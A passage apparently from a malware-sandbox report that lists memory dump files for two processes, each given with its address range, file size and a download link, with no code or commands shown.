                          • memory/2780-14-0x00007FF959ED3000-0x00007FF959ED5000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/2780-12-0x00007FF959ED0000-0x00007FF95A991000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2780-15-0x00007FF959ED0000-0x00007FF95A991000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2780-58-0x00007FF959ED0000-0x00007FF95A991000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2780-11-0x00007FF959ED0000-0x00007FF95A991000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/2780-6-0x00000234C9220000-0x00000234C9242000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/3900-55-0x0000000001200000-0x0000000005864000-memory.dmp

                            Filesize

                            70.4MB

                            Download